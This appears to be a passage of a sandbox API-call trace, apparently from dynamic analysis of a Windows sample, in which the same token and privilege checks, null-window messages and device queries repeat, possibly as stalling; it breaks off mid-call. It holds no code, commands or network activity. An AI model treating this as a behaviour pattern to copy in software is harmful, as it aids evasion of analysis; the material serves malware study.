0 [0084.692] GetLastError () returned 0x3f0 [0084.692] GetCurrentProcess () returned 0xffffffff [0084.692] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.692] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.692] SetLastError (dwErrCode=0x522) [0084.692] CloseHandle (hObject=0x114) returned 1 [0084.692] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.692] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.692] GetLastError () returned 0x578 [0084.692] SetLastError (dwErrCode=0x578) [0084.692] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.692] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.692] GetCurrentThread () returned 0xfffffffe [0084.692] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.692] GetLastError () returned 0x3f0 [0084.692] GetCurrentProcess () returned 0xffffffff [0084.692] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.692] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.692] SetLastError (dwErrCode=0x522) [0084.692] CloseHandle (hObject=0x114) returned 1 [0084.692] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.692] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.692] GetLastError () returned 0x578 [0084.692] SetLastError (dwErrCode=0x578) [0084.692] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.692] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.692] GetCurrentThread () returned 0xfffffffe [0084.692] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.692] GetLastError () returned 0x3f0 [0084.692] GetCurrentProcess () returned 0xffffffff [0084.692] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.692] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.692] SetLastError (dwErrCode=0x522) [0084.692] CloseHandle (hObject=0x114) returned 1 [0084.692] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.692] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.692] GetLastError () returned 0x578 [0084.692] SetLastError (dwErrCode=0x578) [0084.692] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.692] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.693] GetCurrentThread () returned 0xfffffffe [0084.693] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.693] GetLastError () returned 0x3f0 [0084.693] GetCurrentProcess () returned 0xffffffff [0084.693] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.693] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.693] SetLastError (dwErrCode=0x522) [0084.693] CloseHandle (hObject=0x114) returned 1 [0084.693] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.693] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.693] GetLastError () returned 0x578 [0084.693] SetLastError (dwErrCode=0x578) [0084.693] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.693] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.693] GetCurrentThread () returned 0xfffffffe [0084.693] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.693] GetLastError () returned 0x3f0 [0084.693] GetCurrentProcess () returned 0xffffffff [0084.693] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.693] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.693] SetLastError (dwErrCode=0x522) [0084.693] CloseHandle (hObject=0x114) returned 1 [0084.693] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.693] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.693] GetLastError () returned 0x578 [0084.693] SetLastError (dwErrCode=0x578) [0084.693] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.693] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.693] GetCurrentThread () returned 0xfffffffe [0084.693] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.693] GetLastError () returned 0x3f0 [0084.693] GetCurrentProcess () returned 0xffffffff [0084.693] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.693] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.693] SetLastError (dwErrCode=0x522) [0084.693] CloseHandle (hObject=0x114) returned 1 [0084.693] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.693] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.693] GetLastError () returned 0x578 [0084.693] SetLastError (dwErrCode=0x578) [0084.693] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.693] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.694] GetCurrentThread () returned 0xfffffffe [0084.694] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.694] GetLastError () returned 0x3f0 [0084.694] GetCurrentProcess () returned 0xffffffff [0084.694] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.694] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.694] SetLastError (dwErrCode=0x522) [0084.694] CloseHandle (hObject=0x114) returned 1 [0084.694] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.694] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.694] GetLastError () returned 0x578 [0084.694] SetLastError (dwErrCode=0x578) [0084.694] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.694] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.694] GetCurrentThread () returned 0xfffffffe [0084.694] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.694] GetLastError () returned 0x3f0 [0084.694] GetCurrentProcess () returned 0xffffffff [0084.694] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.694] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.694] SetLastError (dwErrCode=0x522) [0084.694] CloseHandle (hObject=0x114) returned 1 [0084.694] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.694] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.694] GetLastError () returned 0x578 [0084.694] SetLastError (dwErrCode=0x578) [0084.694] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.694] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.694] GetCurrentThread () returned 0xfffffffe [0084.694] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.694] GetLastError () returned 0x3f0 [0084.694] GetCurrentProcess () returned 0xffffffff [0084.694] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.694] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.694] SetLastError (dwErrCode=0x522) [0084.694] CloseHandle (hObject=0x114) returned 1 [0084.694] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.694] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.694] GetLastError () returned 0x578 [0084.694] SetLastError (dwErrCode=0x578) [0084.694] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.694] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.695] GetCurrentThread () returned 0xfffffffe [0084.695] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.695] GetLastError () returned 0x3f0 [0084.695] GetCurrentProcess () returned 0xffffffff [0084.695] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.695] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.695] SetLastError (dwErrCode=0x522) [0084.695] CloseHandle (hObject=0x114) returned 1 [0084.695] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.695] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.695] GetLastError () returned 0x578 [0084.695] SetLastError (dwErrCode=0x578) [0084.695] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.695] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.695] GetCurrentThread () returned 0xfffffffe [0084.695] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.695] GetLastError () returned 0x3f0 [0084.695] GetCurrentProcess () returned 0xffffffff [0084.695] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.695] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.695] SetLastError (dwErrCode=0x522) [0084.695] CloseHandle (hObject=0x114) returned 1 [0084.695] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.695] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.695] GetLastError () returned 0x578 [0084.695] SetLastError (dwErrCode=0x578) [0084.695] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.695] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.695] GetCurrentThread () returned 0xfffffffe [0084.695] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.695] GetLastError () returned 0x3f0 [0084.695] GetCurrentProcess () returned 0xffffffff [0084.695] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.695] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.695] SetLastError (dwErrCode=0x522) [0084.695] CloseHandle (hObject=0x114) returned 1 [0084.695] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.695] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.695] GetLastError () returned 0x578 [0084.695] SetLastError (dwErrCode=0x578) [0084.695] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.695] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.696] GetCurrentThread () returned 0xfffffffe [0084.696] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.696] GetLastError () returned 0x3f0 [0084.696] GetCurrentProcess () returned 0xffffffff [0084.696] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.696] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.696] SetLastError (dwErrCode=0x522) [0084.696] CloseHandle (hObject=0x114) returned 1 [0084.696] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.696] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.696] GetLastError () returned 0x578 [0084.696] SetLastError (dwErrCode=0x578) [0084.696] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.696] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.696] GetCurrentThread () returned 0xfffffffe [0084.696] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.696] GetLastError () returned 0x3f0 [0084.696] GetCurrentProcess () returned 0xffffffff [0084.696] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.696] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.696] SetLastError (dwErrCode=0x522) [0084.696] CloseHandle (hObject=0x114) returned 1 [0084.696] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.696] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.696] GetLastError () returned 0x578 [0084.696] SetLastError (dwErrCode=0x578) [0084.696] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.696] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.696] GetCurrentThread () returned 0xfffffffe [0084.696] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.696] GetLastError () returned 0x3f0 [0084.696] GetCurrentProcess () returned 0xffffffff [0084.696] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.696] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.696] SetLastError (dwErrCode=0x522) [0084.696] CloseHandle (hObject=0x114) returned 1 [0084.696] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.696] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.696] GetLastError () returned 0x578 [0084.696] SetLastError (dwErrCode=0x578) [0084.696] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.696] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.697] GetCurrentThread () returned 0xfffffffe [0084.697] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.697] GetLastError () returned 0x3f0 [0084.697] GetCurrentProcess () returned 0xffffffff [0084.697] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.697] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.697] SetLastError (dwErrCode=0x522) [0084.697] CloseHandle (hObject=0x114) returned 1 [0084.697] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.697] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.697] GetLastError () returned 0x578 [0084.697] SetLastError (dwErrCode=0x578) [0084.697] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.697] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.697] GetCurrentThread () returned 0xfffffffe [0084.697] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.697] GetLastError () returned 0x3f0 [0084.697] GetCurrentProcess () returned 0xffffffff [0084.697] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.697] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.697] SetLastError (dwErrCode=0x522) [0084.697] CloseHandle (hObject=0x114) returned 1 [0084.697] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.697] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.697] GetLastError () returned 0x578 [0084.697] SetLastError (dwErrCode=0x578) [0084.697] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.697] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.697] GetCurrentThread () returned 0xfffffffe [0084.697] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.697] GetLastError () returned 0x3f0 [0084.697] GetCurrentProcess () returned 0xffffffff [0084.697] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.697] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.697] SetLastError (dwErrCode=0x522) [0084.697] CloseHandle (hObject=0x114) returned 1 [0084.697] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.697] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.697] GetLastError () returned 0x578 [0084.697] SetLastError (dwErrCode=0x578) [0084.697] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.697] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.698] GetCurrentThread () returned 0xfffffffe [0084.698] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.698] GetLastError () returned 0x3f0 [0084.698] GetCurrentProcess () returned 0xffffffff [0084.698] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.698] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.698] SetLastError (dwErrCode=0x522) [0084.698] CloseHandle (hObject=0x114) returned 1 [0084.698] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.698] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.698] GetLastError () returned 0x578 [0084.698] SetLastError (dwErrCode=0x578) [0084.698] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.698] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.698] GetCurrentThread () returned 0xfffffffe [0084.698] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.698] GetLastError () returned 0x3f0 [0084.698] GetCurrentProcess () returned 0xffffffff [0084.698] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.698] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.698] SetLastError (dwErrCode=0x522) [0084.698] CloseHandle (hObject=0x114) returned 1 [0084.698] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.698] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.698] GetLastError () returned 0x578 [0084.698] SetLastError (dwErrCode=0x578) [0084.698] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.698] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.698] GetCurrentThread () returned 0xfffffffe [0084.698] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.698] GetLastError () returned 0x3f0 [0084.698] GetCurrentProcess () returned 0xffffffff [0084.698] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.698] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.698] SetLastError (dwErrCode=0x522) [0084.698] CloseHandle (hObject=0x114) returned 1 [0084.698] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.698] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.698] GetLastError () returned 0x578 [0084.698] SetLastError (dwErrCode=0x578) [0084.698] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.698] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.698] GetCurrentThread () returned 0xfffffffe [0084.699] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.699] GetLastError () returned 0x3f0 [0084.699] GetCurrentProcess () returned 0xffffffff [0084.699] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.699] PrivilegeCheck (in: ClientToken=0x114, 